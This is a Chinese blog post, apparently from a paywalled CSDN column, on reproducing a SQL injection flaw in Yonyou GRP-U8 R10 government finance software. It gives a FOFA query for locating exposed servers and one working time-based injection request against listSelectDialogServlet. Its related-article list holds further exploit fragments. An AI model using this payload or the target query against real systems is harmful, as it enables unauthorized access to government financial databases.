【漏洞复现】用友GRP-U8 listSelectDialogServlet SQL注入漏洞

最新推荐文章于 2024-05-27 12:18:31 发布

从不学安全

最新推荐文章于 2024-05-27 12:18:31 发布

阅读量267

点赞数

分类专栏：漏洞复现文章标签： php 开发语言

本文链接：https://blog.csdn.net/qq_67810151/article/details/137279583

版权

漏洞复现专栏收录该内容

99 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了用友GRP-U8R10行政事业内控管理软件的listSelectDialogServlet接口存在的SQL注入漏洞，详细阐述了漏洞概述、影响范围，并展示了漏洞复现的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

用友GRP-U8R10行政事业内控管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8R10行政事业内控管理软件 listSelectDialogServlet 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

0x03 测绘语句

fofa: app="用友-GRP-U8"

0x04 漏洞复现

GET /listSelectDialogServlet?slType=slFZX&slCdtn=1=2;WAITFOR+DELAY+%270:0:3%27-- HTTP/1.1

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

用友GRP-U8 listSelectDialogServlet SQL注入漏洞复现

0xSec

02-05

602

用友GRP-U8R10行政事业内控管理软件listSelectDialogServlet 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

用友GRP-U8 operOriztion SQL注入漏洞复现

0xSec

04-18

586

用友GRP-U8R10行政事业内控管理软件/services/operOriztion 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

参与评论您还未登录，请先登录后发表或查看评论

用友OA U8 test.jsp sql注入漏洞复现

qq_44828901的博客

06-21

2025

简单验证、复现漏洞

用友GRP-u8 XXE 漏洞复现

Adminxe的博客

09-23

2255

0x00 漏洞描述用友GRP-u8存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载恶意外部文件。 0x01 漏洞利用条件无需登录 0x02 漏洞复现 POC: POST /Proxy HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: localhost Content-Lengt...

用友GRP-u8 注入-RCE漏洞

maverickpig的博客

07-09

6168

用友GRP-u8 注入-RCE漏洞工作中遇到的漏洞，基于前人的复现教程成功复现，记录下自己的复现笔记，如有侵权，请联系我删除漏洞详情用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。该系统被曝存在XXE漏洞，该漏洞源于应用程序解析XML输入时没有进制外部实体的加载，导致可加载恶意外部文件。最终产生两种后果，一是可以进行SQL注入，执行SQL语句；二是导致命令执行，当用户可以控制命令执行函数中

【高危】用友 U8 Cloud、GRP-U8、A++V8.31存在多个高危漏洞

murphysec的博客

06-07

1989

墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司，核心团队来自百度、华为、乌云等企业，公司为客户提供完整的软件供应链安全管理平台，围绕SBOM提供软件全生命周期的安全管理，平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。用友 GRP-U8 存在3个高危漏洞，分别为forgetPassword_old.jsp SQL注入漏洞、XML实体注入漏洞、XXNode SQL注入漏洞。用友@[GRP-U8, GRP-U8]

玩转CodeQLpy之用友GRP-U8漏洞挖掘

C20220511的博客

03-09

1370

通过CodeQLpy可以辅助代码审计人员快速定位代码中的问题，目前支持对SprintBoot的jar包，SpringMVC的war包，直接下载的源码文件夹，maven项目源码等方式进行自动化代码审计，详细使用方式参考github。使用CodeQLpy可以直接从目标源码中找到上百个高危的漏洞，包括但不限于反序列化，任意文件上传，任意文件删除，SQL注入，SSRF，XSS等，如图2.2所示。利用CodeQLpy生成的数据库，结合CSV文件中保存的有结果的插件名称，可以在VS中复现漏洞查找过程。

用友GRP-U8 userInfoWeb SQL注入致RCE漏洞复现 (XVE-2024-10539)

0xSec

05-14

769

用友GRP-U8R10行政事业内控管理软件userInfoWeb接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

用友GRP-U8 operOriztion SQL注入漏洞（含批量验证poc）

weixin_43567873的博客

04-28

245

用友GRP-U8 operOriztion SQL注入漏洞（含批量验证poc）

用友GRP-U8 sqcxIndex.jsp SQL注入致RCE漏洞复现(XVE-2024-12560)

最新发布

0xSec

05-27

690

用友GRP-U8R10行政事业内控管理软件sqcxIndex.jsp 接口处存在SQL注入漏洞，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。

Goby 漏洞发布｜用友 U8 Cloud ActionHandlerServlet 远程代码执行漏洞

m0_46699477的博客

11-07

484

用友 U8 Cloud 是一种基于企业互联网理念设计的云 ERP 整体解决方案，集成了人力资源、财务会计、物流库存、客户关系和生产制造等功能，旨在推动企业实现敏捷经营、轻量化管理和简化IT操作，并提供安全可信、合规可靠的服务。用友 U8 Cloud 存在反序列化代码执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

【复现】用友U8 oa协同工作系统文件上传漏洞_57

fushuang333的博客

02-24

1274

【复现】用友U8 oa协同工作系统文件上传漏洞，上传文件漏洞的影响可能会非常严重，上传可执行代码可能让攻击者获得服务器控制权。

【复现】用友GRP-U8 XXE漏洞_14

fushuang333的博客

01-10

704

【复现】用友GRP-U8 XXE漏洞，通过上传xml文件，导致可加载恶意外部文件和代码，造成任意文件读取，命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等

【漏洞复现】金和OA XmlDeal.aspx XXE漏洞

qq_67810151的博客

04-01

618

金和OA-C6-XmlDeal.aspx接口存在XML实体注入漏洞，未授权的攻击者可通过该漏洞获取服务器敏感数据。

网康 NS-ASG安全网关存在远程命令执行漏洞复现

薛定谔嘚喵博客

10-09

634

网康应用安全网关系统存在远程命令执行漏洞，攻击者通过漏洞可以执行任意命令，导致服务器失陷。

【漏洞复现】网络验证系统SQL注入漏洞 0day

失心少年

04-02

236

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！网络验证系统 getInfo 存在SQL注入漏洞。

用友 GRP-U8 存在sql注入漏洞复现

zkaqlaoniao的博客

10-30

1375

Track 安全社区 — 掌控安全在线教育- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者info:name: 用友GRP-U8 License Check漏洞requests:path:kjnd=1';matchers:dsl:还没看够？可以关注~免费领取安全学习资料包！（私聊进群一起学习，共同进步）渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶。

用友GRP-U8 SelectDMJE.jsp存在SQL注入漏洞

qq_39573664的博客

01-24

661

用友GRP-U8R10行政事业内控管理软件在SelectDMJE.jsp接口存在潜在的SQL注入漏洞，未经授权的攻击者有可能利用这个漏洞获取对数据库的权限。进一步的攻击可能导致攻击者获取服务器权限，带来严重的安全风险。

用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

0xSec

03-21

5739

用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。